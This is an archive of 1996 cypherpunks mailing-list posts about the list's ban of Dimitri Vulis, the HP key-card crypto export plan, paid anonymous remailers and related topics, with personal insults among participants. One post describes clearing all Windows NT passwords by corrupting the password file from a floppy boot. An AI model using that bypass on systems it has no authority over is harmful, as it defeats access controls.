> issuing bonds (debt) and paying tax-deducuble interest than by selling its
> stock (equity) and paying non-decuctible dividentds to stockholders.

This statement is very questionable. Various classes of shareholders
(such as pension funds and IRA account holders, among others) pay no 
taxes on dividends. Corporations pay taxes only from about 30% of
dividend income that they receive.

There is, in fact, a neat theorem that says that (*_under certain 
assumptions_*) the value of a firm does not depend on its capital
structure.

> > >  5) I pay 40% in taxes, so $18 left
> >
> > I'm afraid you are conflating the MARGINAL rate (and when you consider
> > federal, state and local taxes varies by state) with the AVERAGE rate.
> > Here in FL. for example there is no state or local income tax.  With tax
> > sheltering, mortgage deductions etc. no one pays 40% -- the middle class
> > pay a lower average rate, the upper class pay a much lower average rate.
> 
> That varies with the locale - here I pay the federal income tax plus the New
> York State income tax plus the New York City income tax. I once had a job offer
> from IBM at $79K/year in Boca Raton (which I eventually didn't take anyway) -
> it's a ridiculous salary in NYC, but a decent one in Florida.

You forget about alligators.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cvhd@indyweb.net
Date: Sat, 16 Nov 1996 14:50:42 -0800 (PST)
To: Alan Olsen <alan@ctrl-alt-del.com>
Subject: Re: Giving Kill Files a Workout...
Message-ID: <3.0b36.32.19961116175025.006b441c@indyweb.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:52 AM 11/16/96 -0800, you wrote:

>What a week!  What is this?  "Net Loon pig-pile on Cypherpunks day?"

>So far i have killfiled three people in the past two days.  (That is the
>total number I filtered to trash before that date.)

>For those of you who are sick of wading through this mess, I am willing to
>show you what it will take to filter those of your choice to /dev/null or
>its local equivelent. (procmail can be your friend!)

>Maybe after some creative filtering, the list will settle back to the usual
>noise, instead of the net-loon noise.

As the smoke from the first rounds of cyber-gunfire of the Gilmore vs
Vulius shootout were wafting thru C-space several of us were bemoaning the
fact that the entire issue hadn't been handled thru creative filtering on
the part of list members as opposed to the heavy-handed "Big-Bro'ish" plug
pulling by Mr. Gilmore.  The "net-loon noise" level increase was
predictable.  Like you I will continue to perform creative filtering in
order to extract the 4 out of 240 messages worth reading in any given 48
hour period. 

cvhd 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Sat, 16 Nov 1996 10:14:00 -0800 (PST)
To: cypherpunks <unicorn@schloss.li>
Subject: Re: Conspiring to commit voodoo
In-Reply-To: <199611150326.TAA07305@mail.pacifier.com>
Message-ID: <199611161815.LAA10673@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


        OK, that's an interesting, but not that isolated an incident....
        
        in the early 60s, I was stopped in Providence late at night by
    an officer (driving a red '57 bird which says 'give me a ticket') . 
    no big real other than the 4+ hours of hassle since the officer
    did not like my license and wanted "proof"  --at 4am. finally,
    they let me call ALA (auto. legal assoc.) and an attorney managed
    to spring me.  

        at that time, the bill was about $150.  ALA paid the bill.

        but, at renewal, the ALA would not renew as a I had "multiple"
    arrests.   seems like the ALA's local contract attorney had 
    "represented" me two more times in his area  --he was paid, I had
    the violations on record  --I just wasn't there for any of it!  Not
    bad for a little extra paperwork --for three phone calls he made
    almost $700!  not bad for 60-62.

        I guess the phantom struck again!

        OK, Jim, tell us WHY you don't respect unicorn for his story? 
    At that time Patriarcha was the NE don --judging from the news
    reports during the years I was at Harvard, AP must have been a
    common practice --except it was probably a closed betting pool.
    time for the three little monkeys on that one....

            -attila

--
    Cyberspace and Information are Freedom!  
        FUCK your WIPO, too. 
                -attila





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 15:21:34 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Does John Gilmore...
In-Reply-To: <3.0.32.19961116100146.0074095c@mail.teleport.com>
Message-ID: <PRDiXD15w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Burroughs <richieb@teleport.com> writes:
> >I have a suggestion for "Aga" and others who believe this sort of
> >nonsense.  Please do us all a favor and try to sue John.  I'm sure
> >that among all jack-leg and wannabe lawyers on this list that they
> >can come up with a viable cause of action.  And John has deep
> >pockets; you could (literally) make out like bandits AND rescue
> >"freedom of speech" on privately maintained mailing lists.
>
> Such a case would obviously fail.  John has the right to ban anyone he
> wants from a list that he is hosting.

Sure he does - I've been saying all along that John Gilmore has the right to
act dishonorably, which he exercises. Yet the censorship supporters keep
attributing to me the diametrically opposite view - that the state can force
John to carry even the opinions he disagrees with. This is not what I've been
saying, of course. John Gilmore lied when he attributed this opinion to me (as
quoted by Declan McCulough). Only his honor could force him to do that, but he
has no honor and no credibility. John had the right to exercise censorship on
his private mailing list, which is precisely what he did.

> I do question, though, whether or not it was the best way to handle the
> situation.  As I have argued, the availability of end-user filtering made
> banning Dimitri from the list unnecessary, IMHO.  And the list owner giving
> people the boot sure doesn't fit with the picture I have had of what
> cypherpunks was about.  YMMV.

Same here - I used to have respect for John Gilmore, but now I don't.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Sun, 17 Nov 1996 10:51:18 -0800 (PST)
To: Hal Finney <hal@rain.org>
Subject: Computer CPU chips with built-in crypto?
In-Reply-To: <199611161913.LAA01571@crypt.hfinney.com>
Message-ID: <v03007805aeb4208db8aa@[17.219.102.27]>
MIME-Version: 1.0
Content-Type: text/plain


In a note to cypherpunks, Hal Finney comments on the new crypto
initiative:
>
>It's also not clear what the hardware manufacturers get out of this.
>Their sales overseas have never been blocked.  There has been no demand
>for custom crypto hardware.  I don't see how they have been harmed by an
>inability to ship computers with built-in encryption hardware.  Granted
>there are some possible applications for such systems but I don't see the
>market demand which would drive this decision.
>

I'm not sure if I can answer this but, at last week's SF cypherpunks
meeting, an Intel engineer asked whether there might be any interest
in a computer chip with some sort of encryption mechanism built
into the chip. As I understand it, this chip would process an
encrypted instruction stream. I.e., it could not execute a program
unless the "key" for that program was first loaded into the chip.

An interesting idea: does anyone have more information?

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 16 Nov 1996 15:01:55 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: One Big Telecoms Company
Message-ID: <3.0b36.32.19961116165519.00cebb24@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:23 PM 11/15/96 -0800, Dale Thorn wrote:

>Progress?  Most major cities (when I was a kid) had *several* competing
>newspapers, 

Few realize that NYC today has circa 20 daily newspapers (circa 5 in
English and circa 15 in other languages).  

In addition, I can read a hundred daily newspapers (or more) on the nets.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dshipman@ewol.com (Dave Shipman)
Date: Sat, 16 Nov 1996 15:18:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: THAT is what makes ---Snipshit---------
Message-ID: <3.0.32.19961116181623.00697054@mail.ewol.com>
MIME-Version: 1.0
Content-Type: text/plain


>>> time for ------Snipshit---------
>> An excellent --------Snipshit-------------
> 
>In that case ---------------Snipshit------------
 
>Jai Maharaj
>%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:% Om Shanti %:%:%

Splash!! Another one falls from filter to Crap Bucket. Damn, a week ago I
didn't even know how to *use* a filter!


DLS
---------------
A fanatic is one who can't change his mind and won't change the
subject.
                -- Winston Churchill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Sat, 16 Nov 1996 18:22:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Utility of Privacy
Message-ID: <199611170222.SAA10990@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



Privacy is a hassle.  Is it worth it?

Which unfortunate situations does privacy prevent?  What are the odds
that they will occur?  How much effort will it take to prevent these
outcomes?  As a model, use the present and future situation of a
typical reader of this list.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 16 Nov 1996 20:29:13 -0800 (PST)
To: m5@tivoli.com
Subject: Re: THAT is what makes John Gilmore an ASSHOLE!
In-Reply-To: <Pine.LNX.3.95.961115073500.2693I-100000@dhp.com>
Message-ID: <328E79CB.103F@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally wrote:
> Dale Thorn wrote:
> > Mike McNally wrote:
> > > (So what if John decided simply to pull the plug on toad in order to
> > > plug in a new hot tub?)

> > Well, what if he did?  Are you sure that would make aga look like a
> > fool, or would it make you look like a fool, since it would tend to
> > confirm what people like aga have been saying?

> No, and it's not clear to me why you think my question had anything to
> do with my wanting "aga" to look like a fool.  That was not my intent.

You mean you really respected what "aga" was saying?

> I simply question the claim by "aga" that somehow Mr. Gilmore is
> obligated to provide his services and capital to support the "public
> property" that the cypherpunks list has allegedly become, as opposed
> to treating it like the ephemeral by-product of software running on a
> computer he owns.

Neither "aga", nor myself, nor anyone else I know has suggested what you
claim, anymore than we would obligate ourselves to do it. This is merely
a classic denial technique you and others are using.

The fact is, the list does run, and you'd have a hard time convincing me
or anyone else that (according to your claim) John would somehow be spending
*more* capital and doing *more* support if he hadn't cut the "Doctor" off
of the list.

What myself and others would like to see (and we're willing to argue for
such a thing as much as is humanly possible) is a non-hypocritical list,
where a person is not banned for the content of their speech as Vulis was.

People who agree with you drone on ad nauseam about Vulis' "actions",
another denial technique IMO. What Vulis *did* was speech, not "actions".

Frankly, I would much rather read his postings than the anti-speech drivel
that's been posted so much here lately.

I'm guessing John must be thinking one of a couple things:

1. Like a home property in Beverly Hills, where all the lawns are neatly
   trimmed, and everyone behaves so properly, John looks at "his" list one
   day and freaks out, saying to himself something like "gadzooks, Vulis
   is trashing my list, as though he moved in next door and lowered the
   value of "my property".

   And don't get me wrong, I understand the feeling, it's just that when
   you've decided you have a "right" to control something like cypherpunks,
   all you're really going to accomplish is to lessen your own reputation,
   because you can't control cypherpunks like you can property in B.Hills.

   If you like the Beverly Hills analogy, try to come up with a scenario
   where (as in Beverly Hills) you can get the cooperation and approval of
   85% - 95% of the residents (subscribers) to boot out the undesirables.

2. John may have become concerned about his possible liability for some
   of the postings (accusations of child molesting, etc.), and panicked
   and did the knee-jerk damage control he thought best.

   Now, under ordinary circumstances, a list "owner" or operator may not
   be responsible for any of the traffic content, as long as it can be
   demonstrated that they "weren't aware" of any libelous content. In the
   case of cypherpunks, though, Gilmore could scarcely deny knowing about
   some of this stuff.  **This is mere conjecture on my part**.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 16 Nov 1996 20:29:25 -0800 (PST)
To: apteryx@super.zippo.com
Subject: Re: A New Crypto Announcement--Could be Ominous
In-Reply-To: <v03007803aeb2869761df@[207.167.93.63]>
Message-ID: <328E7C44.C55@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Mark Heaney wrote:
> >It sounds ominous to me. Another backroom deal, probably for some form of
> >key recovery strategy, aka GAK.

> It sure looks like it, the following quotes from CNN's web page:
> http://www.cnn.com/TECH/9611/15/encryption.reut/index.html
> make it pretty clear that US government-approved export of strong
> cryptography is part of the announcement. What else could it be except gak?
> "If the encryption technology has won the backing of industry and the
> U.S. and other governments -- which Hewlett-Packard officials say is
> the case -- the development could eliminate a key obstacle to the
> growth of electronic commerce via the Internet. "
> "The technology will make it possible to export products containing
> so-called "strong encryption," which have not been exportable under
> national security laws dating back to the Cold War. "

Just a thought:  You remember that Uncle Dave (Packard, now deceased) was
the assistant Sec. of Defense, etc.  Don't think for a minute Lew Platt
and his boys don't have this one in the bag.

I once asked a couple of their PR engineers (they used to have those) if
HP would ever release (for example) the internals of their 1MB1 Capricorn
chip, which ran at 0.6 mhz (that's 640 khz!), and their answer as best I
remember was words and gestures to the effect of "no f______ way".

HP knows what's breakable and what's not, unlike you and me, and you just
know they're not going to put anything *really* important out there where
Bill and Hillary can get their paws on it.  Seems to me it's a matter of
who are you gonna line up with when the shit comes down, so to speak.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 16 Nov 1996 18:46:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cypherpunks State of Emergency
In-Reply-To: <1.5.4.32.19961117011708.007245d0@pop.pipeline.com>
Message-ID: <v03007801aeb42b9f9114@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



I think it's apparent that the events of Friday, with the other shoe to
drop on Monday (the H-P/Intel/Microsoft/etc. Final Capitulation), signal to
us that we are in a State of Emergency.

The Presidents of this country are in the habit of declaring such States of
Emergency, often essentially secretly (in that the sheeple know little of
such things, and those who speak of NSDDs and PDDs and EOs are demonized by
the media as "conspiracy nuts" and "militia members").

Maybe it's time for us to stop flaming about Vulis and his allies, and
concentrate on the Real War.


At 8:17 PM -0500 11/16/96, John Young wrote:
...
>Not to diminish the validity of Tim's alarm, is there not reason to
>anticipate that
>these tokens will be crackable. And thus continue the race between crypto
>enforcers and crackers?

Well, don't misunderstand me. I'm not saying "Give up."

In fact, the transparent nature of the government's "voluntary key escrow
for domestic users" strategy should cause redoublings and retriplings of
our efforts.

As John's SWAN program emphasizes, there still are no _import restrictions_
on crypto (and there may be severe constitutional impediments, as we've
debated several times). Get enough alternate channels using non-GAK crypto,
and even the latest Clipper won't succeed.

And sabotaging the GAK scheme in more devious ways remains an option. (I
hear some nym on BlackNet is still bidding $125,000 payable to any offshore
account for certain details related sabotaging GAK.)


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 16:10:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Giving Kill Files a Workout...
In-Reply-To: <328DF064.740B@gte.net>
Message-ID: <H7FiXD17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:

> Alan Olsen wrote:
> > What a week!  What is this?  "Net Loon pig-pile on Cypherpunks day?"
> > So far i have killfiled three people in the past two days.  (That is the
> > total number I filtered to trash before that date.)
> > For those of you who are sick of wading through this mess, I am willing to
> > show you what it will take to filter those of your choice to /dev/null or
> > its local equivelent. (procmail can be your friend!)
>
> Thank you in advance for your filtering instructions (yawn).
>
> BTW, why would anyone give a shit whether you killfiled anyone or not?

But, Dale, that's the whole point of censorship: people like Alan Olsen
and John Gilmore and Jim Ray aren't satisfied when they've killfiles a
source of noise they consider annoying so it doesn't bother them anymore.
They feel compelled to silence it altogether. They claim altruistically
that they don't want the noise to bother anyone else, such as the clueless
newbies who keep subscribing to this mailing list and don't know how to
use mail filters. (Sandy Sanford's concern for them was soooo touching...)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Sat, 16 Nov 1996 16:00:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Remailer Pricing
In-Reply-To: <n1364045177.55582@mail.ndhm.gtegsc.com>
Message-ID: <0mXZIy200YUf13OHI0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com> writes:
> Peter Hendrickson's electrons stated
> >
<snip>
> 
> Perhaps we've been thinking about anonymous mail the wrong way.  Is it
> like the U.S. Post Office where you have to physically go someplace,
> buy a stamp, physically write your message, put it in a physical envelope,
> carry it to a box someplace, and then wait (maybe four days) for it to
> arrive, all for "only" 32 cents?  Or is it more like Federal Express
> where you pay 20 bucks and it arrives the next day, for sure, every time?
> 
> Earlier today somebody sent a message about his scary former employers
> and (apparently) how they just kill people.  Would that person pay, say,
> $5 to have the message delivered reliably and very anonymously?  My
> judgement is that it would be worth every penny, and probably more.

Umm, okay, great. So we eliminate all the spam, all the harrassment,
all the frivolous anonymous mail, everyone who uses anon remailers as
a matter of course, and what do you get? One message slowly going
through the system, tracked every step of the way by <indert evil org
here>. Message reordering doesn't help much with one message. The
remailer net *needs* traffic. Preventing spammers is one thing,
discouraging use of remailers in general is another.

> 
> >Right now the remailer network is a mess.  There just aren't that many
> >remailers operating in a timely and reliable manner.  I am not knocking
> >the remailer operators for this, it's just clear that "free" doesn't
> >make it worth their while to keep the remailers operating perfectly
> >at all times.
> 
> Very true.  This strengthens my point that the remailer operator would
> want a piece of the pie, as well...

I suggest that US$.15 to US$.05 per message would be quite reasonable
compensation. The price can't be high enough to make people think
about it, unless they're going to send lots of messages.

> >A good pricing strategy for remailers would be to charge, say, $1 for
> >instant delivery, $.50 for 30 minute delivery, etc.  To generate
> >interest, 4 hour delays could be imposed for free remailing, if the
> >resources are available.
> 
> fTotalCostOfDelivery = fCostOfReceipt + nRemailersUsed * fRemailerCost
> 
> Obviously, nRemailersUsed is only necessary for anonymous chaining...
> 
> Don't get me wrong, there's nothing meant by this equation, no point 
> trying to be made, nothing.  I'm just showing you the pricing strategy.

This pricing strategy would greatly serve the cause of traffic
analysis. There has to be enought delay to collect enought messages to
do some reordering. You could send out bogus messages, but iy wouldn't
be too too difficult to track them far enough to see that they don't
go anywhere interesting.

> I strongly agree with you that paying for remailer use would greatly 
> improve service, and would probably be a good thing.  In the case of
> chaining, there would have to be a great deal of trust involved so none
> of the remailers stole all the postage w/out forwarding the message.  
> (Just a thought, anyway)

That's why you would PGP encrypt the cash. "Trust? What's that, I've
got (ta da) STRONG CRYPTO!"

> Here's an idea I was tossing around sometime earlier--
> One capitalist idea that would invalidate this theory.  A remailer would
> make a lot of money if they made a deal with an advertiser, esp. an 
> advertising agency (containing ads for many companies, if I chose the 
> wrong words) if they eliminated incoming postage, and possibly paid outgoing 
> postage or had the ad agency pay the postage (within limits, of course).
> The remailer would then tag on advertisements to each mailing.  Direct
> marketing (Note: This is what we're trying to avoid, but I see it happening)
> The non-charging remailer would become wildly popular, as they don't 
> charge postage, and they would be fast, because they would have corporate
> sponsorship.  This idea is *far* from being farfetched; it exists now.
> Every mail I receive at my free geocities account has an ad attached.

If remailer prices were trivial, I don't think this would happen.
Besides, chaingin blows this away. The only time an ad gets delivered
to a person is when the advertising remailer delivers it to its final
destination. 

Interesting... those interested in not having to put lots of effort
into management operate internal-only remailers, those interested in
making a buck operate termious-only remailers...

Whee. Diversity. The species evolves.
Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMo5VMckz/YzIV3P5AQFtpwL+JyMwXeo3c606U9ROexVrvy90xdoBYxBO
pBjZ4ujrt5kT7j1Y1A/uRz3qSzBfD94d2nmWNmAkoeTIW9POvO9dwpo8qBUsaAim
JKTFst8apoTpMWyWfh9E2E1pAwUcNN2j
=rxiV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omega@bigeasy.com>
Date: Sat, 16 Nov 1996 16:29:15 -0800 (PST)
To: declan@well.com
Subject: Re: Censorship on cypherpunks?, from The Netly News
Message-ID: <Pine.LNX.3.95.961116193634.2811A-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Declan McCullagh wrote:

> Yes, I understand this. It's quite obvious; being removed from the
> subscriber list hasn't slowed Vulis at all. When I was writing the piece
> Vulis seemed to have slowed his ad hominem attacks and instead was talking
> about censorship (something that is within the charter of the list), but
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
		    
Actually, Declan, it's not.  "info cypherpunks" in the body of a message to
majordomo@toad.com yields the welcome message to the list -- the closest
thing to a charter available.  The subjects of censorship and free speech
are neither mentioned nor alluded to anywhere within that document.

The subjects of censorship & free speech do bear some relationship to the
list's expressed subject and are certainly near and dear to most cypherpunk
hearts.  The government cannot prevent us from discussing the implications 
of privacy enabled by strong crypto.  

Free speech & censorship may even be interesting, entertaining, & important
topics -- hence their consistent recurrance in discussions.  But the above 
assertion is factually wrong.



_______________________________________________________________
 Omegaman <mailto:omega@bigeasy.com> 
  PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63 
 Send e-mail with "get key" in the "Subject:" 
 field to get a copy of my public key
_______________________________________________________________







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Sat, 16 Nov 1996 19:42:59 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <J50HXD11w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.95.961116193331.1181H-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


I told myself that I wouldn't do this but ....

On Sat, 16 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> Dave Kinchlea <security@kinch.ark.com> writes:
> > >
> > > Irrelevant analogy; snail.mail and e-mail.  The former is in physical
> > > form, and the latter usually never is.
> >
> > No kidding, thanks for that information. Perhaps you can explain how it
> > is relevant?
> 
> Very simple: snail mail is much more suitable to be used as evidence in court
> than e-mail.

But I wasn't talking about evidence in court, ALL I was talking about
was personal privacy in a (wasted) reply to aga's assertion that only
criminals would want to use PGP for email. I made the simple observation
that I think it is reasonable for me to not want others to read personal
(e)mail, period. Nothing about courts, law, free speech or anything
else. That was aga's straw-man, not mine.

[...]

> > Another irrelevant and completely inaccurate point. I utilize free
> > speech everyday yet I manage to do it without anonymity.
> 
> It's ironic that I read Dave's e-mail on John Gilmore's private cypherpunks
> mailing list, which is known to be censored by John. If you're subscribed to
> this mailing list, then you're definitely not utilizing free speech.

On the contrary, nothing and nobody has stopped me (or you apparently) 
from speaking openly and freely. You are just being silly.

I didn't even say I opposed anonymity, I just find it distasteful.
 
[...] 

> I don't know that PGP is safe. That's I don't use it.
> (The exception are my NoCeMbots which use PGP to sign their notices, because
> properly implemented NoCeM clients check digital signatures.)

Well, in case you missed it, I was simply having fun with the word
`safe'. As I do not do things illegal and there is nothing in my
encrypted or non-encrypted mail that would get me into trouble, it is of
course perfectly `safe' even if the encryption were broken. Much more
than adequate for the `envelope' that I want it for. 
 
> > > Why are you so paranoid that someone is reading your e-mail?
> >
> > Paranoid? No, but why make it easy for anyone to do so?
> 
> I think the censors' agenda is the opposite: they *don't* want anybody to be

Blah blah blah, this is your argument not mine. I won't help you here.

cheers, kinch






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 16 Nov 1996 20:29:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: San Jose Mercury News declares encryption battle over
In-Reply-To: <199611161913.LAA01571@crypt.hfinney.com>
Message-ID: <328E8BEC.2D76@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney wrote:
> >From the article
> <URL:http://www.sjmercury.com/business/compute/encrypt1115.htm>:
> > Under the plan computer makers could equip their machines, including
> > personal computers, with electronic ''locks'' of almost any strength. A
> > single computer model with strong built-in encryption could legally be
> > sold in both domestic and foreign markets.
> > The key is that the encryption circuitry would be inactive in exported
> > machines, unless both buyer and seller obtained all legally required
> > licenses to turn it on.
> > Domestic customers, and export buyers with a license, would get a special
> > key card to turn on the encryption, according to HP. Manufacturers would
> > thus be relieved of the burden of making different computers for export
> > than for domestic use.

> So it sounds like the idea is to build crypto around card tokens.  I think
> HP has been pushing this for some time.  The question is, will this somehow
> become the only way to get access to crypto?

[snip]

Point 1: HP (if you follow their history) would love to do something
exactly like this.  Microsloth and several hardware vendors (including
HP) are currently working on handheld computers which run a subset of
Win95 (called Pegasus), which are due out this year.  If this project
flies, they'll surely graduate it to laptops, to portable phones and
pagers, etc. etc.  Building a certain amount of the O/S into ROM has
its advantages....

Point 2: I've said something like this before, but here's a place where
it could mean something.  If c-punks and others could divvy up as many
of the supporting functions of "strong" crypto as possible, and issue
them in a set of commonly-available libraries for any and all programmers,
along with source code, then an application programmer (theoretically)
could order up some of these libraries and write some useful crypto code
in short order.  This would be much better than taking on thousands of
lines of source code directly.  This would also allow several vendors to
issue similar libraries, and surely someone on the Net could arrange
for comparitive product reviews.

This way, once you have a product up and running, if you (for example)
would like to replace the XYZ function with something a little better,
without impacting the rest of the code, you could order a replacement
for that function and plug it in, perhaps with no code modifications.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Ghio <ghio@myriad.alias.net>
Date: Sat, 16 Nov 1996 17:04:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: NT insecurity
In-Reply-To: <19961116064952843.AAA201@rn232.io-online.com>
Message-ID: <199611170102.UAA06180@myriad>
MIME-Version: 1.0
Content-Type: text/plain


"Chris Adams" <adamsc@io-online.com> wrote:
> Given the recent comments about insecure machines, I thought it was
> interesting to note that you can clear *every* password on an NT box
> by using a diskeditor to corrupt the password file (Boot off of a floppy
> and use NTFSDOS if you have to).  It'll reboot several times and then
> you'll be allowed to login.

You can do the same with every other operating system that doesn't have
an encrypted filesystem; Microsoft was just the only company dumb enough
to claim their filesystem was secure because they didn't think that
anyone would reverse-engineer it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 18:00:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Could Declan or some libertarian explain this?
In-Reply-To: <328DFEAD.41C@gte.net>
Message-ID: <8kJiXD21w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:

> Rich Graves wrote:
> > >From the so-called fight-censorship list. I would ask there, but the list
> > owner won't let me, and I won't stoop to Vulis's level.
> > |        PLEASE MARK MY WORDS: IF MY BOOK IS NOT RE-PUBLISHED AND AVAILABLE
> > |IN BOOKSTORES, THE CAUSE OF ACADEMIC FREEDOM IN THE WEST WILL BE IN A SORR
> > |STATE.  FEW ACADEMICS WOULD BE PREPARED TO SUFFER THE MANY BLOWS AND
> > |THREATS THAT I HAVE NOW ENDURED FOR SIX MONTHS. IF 'The 'g' Factor'
> > |DISAPPEARS, SO WILL OTHER SERIOUS PRODUCTS OF RESEARCH AND SCHOLARSHIP --
> > |ESPECIALLY IF THEY ARE DEEMED "CONTROVERSIAL" BY THE LIBERAL-LEFT.
>
> > His complaint is that his publisher stopped distribution of his book arguin
> > that blacks are mentally inferior to whites.
> > Could someone please explain to me how Chris Brand is different from Vulis?

The poor guy said something politically incorrect and got censored?

> > I mean in form; in practice, Declan is bashing Vulis for not recognizing
> > rights of private editorial control, but uncritically passing on Mr. Brand'

I don't think Declan said this: if he did, then he was lying. I spnet about
an hour on the phone with him, and I said, among other things, that John
definitely had the right to censor anyone on his private mailing list, which
this is; and John has the right to destroy his own credibility, which he did.
This caused Declan to giggle. Those who attend the DCpunks meeting at Declan's
place can confirm that Declan has a decidedly unheterosexual giggle. Declan
attributes to John Gilmore the claim that I somehow appeal to the state to
protect me from John Gilmore's censorship, which is a lie - that's why I
call John Gilmore a liar, and not Declan. I used Declan to get out pretty
much the message I wanted. I'm satisfied with his writeup.

Actually, there is one passage where he said I object because I wasn't warned
in advance that I'd be unsubscribed. This is not what I told him. I said,
I sent a bunch of e-mails to majordomo@toad.com saying "who cypherpunks" and
"who coderpunks" and "help" and got no response. Eventually I tried the same
from another account and got a response. It was very rude of John to have
majordomo "play dead" without telling me. That's why I call John Gilmore a
sneaky bitch. I don't think Declan understood what I told him. It's clearly
a case of cluelessness, not an intentional lie, as is the case with John.

> > message alleging that private editorial control is censorship. Far be it
> > from me to criticize Declan's right to exercise editorial control over
> > substantive dissent and factual correction, but I was just wondering.
>
> Could someone explain to me why we have to have *any* censorship, if
> people on a list are given tools to filter with and reminded on occasion
> how to use them?

I think this was explained many times over by the likes of Jim Ray and
Sandy Standord: they can filter out the information that bothers them,
but they're bothered even more when someone else receives the information
they don't want them to receive. That's why they seek to silence whoever
they disagree with and not just filter them out of their own mailboxes.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Sat, 16 Nov 1996 17:15:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "Strong" crypto and export rule changes.
In-Reply-To: <199611161733.MAA04178@homeport.org>
Message-ID: <0mXaQD200YUf13OMA0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

